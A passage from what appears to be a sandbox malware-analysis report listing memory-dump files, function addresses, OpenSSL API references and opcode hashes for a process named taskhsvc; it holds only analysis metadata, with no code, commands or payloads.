                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 58dd6135238c269401fa0c49ad6f9988fc5f18985a6a4e526bd44ce6e5e97240
                                                            • Instruction ID: 3508d63f1b437a8f844a29c900d907183603f55c3111dc0f1c39788b1a62837c
                                                            • Opcode Fuzzy Hash: 58dd6135238c269401fa0c49ad6f9988fc5f18985a6a4e526bd44ce6e5e97240
                                                            • Instruction Fuzzy Hash: 7C51E5756097019FCB10EF39C68055FBBF1AB89708F52992CE9A4CB710D330E9459F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEDE520 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A${
                                                            • API String ID: 0-3089528823
                                                            • Opcode ID: 49887e7fbcca7c21046430d741f997b314ae71984241e5ffa71e805eb8192e72
                                                            • Instruction ID: 6d99050d5906026a1d47cee2b53143b5f8fb31b808687f6f104729d529aefdf2
                                                            • Opcode Fuzzy Hash: 49887e7fbcca7c21046430d741f997b314ae71984241e5ffa71e805eb8192e72
                                                            • Instruction Fuzzy Hash: 1661F870609B418FD700DF25C18871ABBF0BF8535CF22895CE9A88B795D779E846CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE21F10 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CE23B7B), ref: 6CE21F35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: %I64i$:$ERROR$OPENSSL_ia32cap$dynamic
                                                            • API String ID: 4216919130-991228966
                                                            • Opcode ID: 59540a810897ba135405ce58ad0939a1dac7738d87b0ed6f643f82f61e1ddab8
                                                            • Instruction ID: 4b23d210d70e3527632c3ec3c9976dd58cb171caa1a3ed82c62447450490b362
                                                            • Opcode Fuzzy Hash: 59540a810897ba135405ce58ad0939a1dac7738d87b0ed6f643f82f61e1ddab8
                                                            • Instruction Fuzzy Hash: E0415331A246008FDF50EF69C580B0AB7F1FB8A318F56891DD6648B700E335EA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CECE480 Relevance: 22.7, APIs: 15, Instructions: 223networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Startup__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2179458116-0
                                                            • Opcode ID: d1fc1a5099482481f4ad226b06f25eb6f57868b527d8761ff9d2d8237c65975e
                                                            • Instruction ID: d7d45adfa863ca4d54aebad11f976f09e202e3ac9b042507b15b97947ba39e72
                                                            • Opcode Fuzzy Hash: d1fc1a5099482481f4ad226b06f25eb6f57868b527d8761ff9d2d8237c65975e
                                                            • Instruction Fuzzy Hash: 7C916771618B408FDB40DF28C64631ABBF1BB86308F21892DE9B48B750D771E906CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE76DA0 Relevance: 22.6, APIs: 15, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$X_start
                                                            • String ID:
                                                            • API String ID: 955869817-0
                                                            • Opcode ID: 5ce9c72dac58f78521c61ae7231d67b41105de5b13ec58f1ef38631c91f5c54a
                                                            • Instruction ID: 1b5584f1128cafd7006b353f115b36cb035c3b4b34bb661d4a86ab793eeebf7f
                                                            • Opcode Fuzzy Hash: 5ce9c72dac58f78521c61ae7231d67b41105de5b13ec58f1ef38631c91f5c54a
                                                            • Instruction Fuzzy Hash: E1419FB0558B048FD3609F2AC58075ABBF0AF89758F21891DE9D987B50E739D848CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF08C10 Relevance: 21.2, APIs: 14, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_dup__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 22153326-0
                                                            • Opcode ID: c4aadba2f9519c588aad9043a153b2f1b33a587443ac9ffd7e014e8808ba25df
                                                            • Instruction ID: 5a4ce6b481315c8487e03a542d24ebd32b308c28572e067be9fe065bd677ff44
                                                            • Opcode Fuzzy Hash: c4aadba2f9519c588aad9043a153b2f1b33a587443ac9ffd7e014e8808ba25df
                                                            • Instruction Fuzzy Hash: CF614C71716B018FDB10DF69C59065BB7F0AF89B48F56592EE9A4CBB00E730E801DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF34EA0 Relevance: 21.1, APIs: 14, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF09D30), ref: 6CF34EC7
                                                            • i2d_X509_NAME.LIBEAY32 ref: 6CF34EF3
                                                            • EVP_sha1.LIBEAY32 ref: 6CF34EF8
                                                            • EVP_Digest.LIBEAY32 ref: 6CF34F26
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: DigestP_sha1X509___stack_chk_faili2d_
                                                            • String ID:
                                                            • API String ID: 740775491-0
                                                            • Opcode ID: 9c98ac777c223b8b6cb096e21c2ebde3d95e01faca9ab9a1df20c884b0bb333b
                                                            • Instruction ID: 6774bb769c23a4daa12f2f91569c27251ea13b34795cadeae8674a639f8d561f
                                                            • Opcode Fuzzy Hash: 9c98ac777c223b8b6cb096e21c2ebde3d95e01faca9ab9a1df20c884b0bb333b
                                                            • Instruction Fuzzy Hash: 115108B56187009FDB40EF28C580A4ABBF0FF88358F46995DE9999B710E335E905CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEACC40 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e$q
